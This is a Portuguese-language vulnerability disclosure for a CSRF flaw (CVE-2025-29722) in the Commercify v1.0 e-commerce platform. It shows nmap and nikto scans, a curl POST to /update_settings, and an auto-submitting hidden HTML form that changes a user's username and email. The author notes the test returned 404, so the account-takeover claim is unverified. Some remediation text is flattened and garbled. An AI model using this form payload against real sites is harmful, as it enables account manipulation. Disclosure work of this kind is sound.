
Falsificação de Solicitação entre Sites (CSRF) no Commercify v1.0
Descoberto por: David P.S Abraham (também conhecido como Davycipher)
CVE-2025-29722 foi atribuído a esta vulnerabilidade pela MITRE Corporation.
Uma vulnerabilidade de CSRF foi identificada no Commercify v1.0, uma plataforma de e-commerce de código aberto desenvolvida por @yassmittal. O aplicativo não possui mecanismos adequados de proteção contra CSRF em endpoints críticos, como /update_settings, permitindo que atacantes criem solicitações maliciosas que modificam dados do usuário quando executadas a partir de outro domínio.
A varredura com nmap revelou que o serviço estava acessível através da porta 5173, indicando um possível servidor de desenvolvimento.
nmap -p 5173 localhost
Em seguida, escaneei o aplicativo usando nikto, revelando:
X-Frame-OptionsAccess-Control-Allow-Origin: *)Ao explorar o aplicativo, suspeitei de um possível endpoint update_settings com base nos recursos do painel do usuário. Testei com:
curl -X POST "http://localhost:5173/update_settings" \
-d "username=attacker&[email protected]"
Embora um 404 Not Found tenha sido retornado, esse comportamento pode depender do ambiente. Em implantações válidas, isso pode levar à manipulação total da conta.
Ataque baseado em HTML para explorar a falha de CSRF:
<form action="http://localhost:5173/update_settings" method="POST">
<input type="hidden" name="username" value="attacker">
<input type="hidden" name="email" value="[email protected]">
</form>
<script>
document.forms[0].submit();
</script>
SameSite ausente*)SameSite=Strict ou Lax nos cookiesDavid P.S. Abraham
Pseudônimo: Davycipher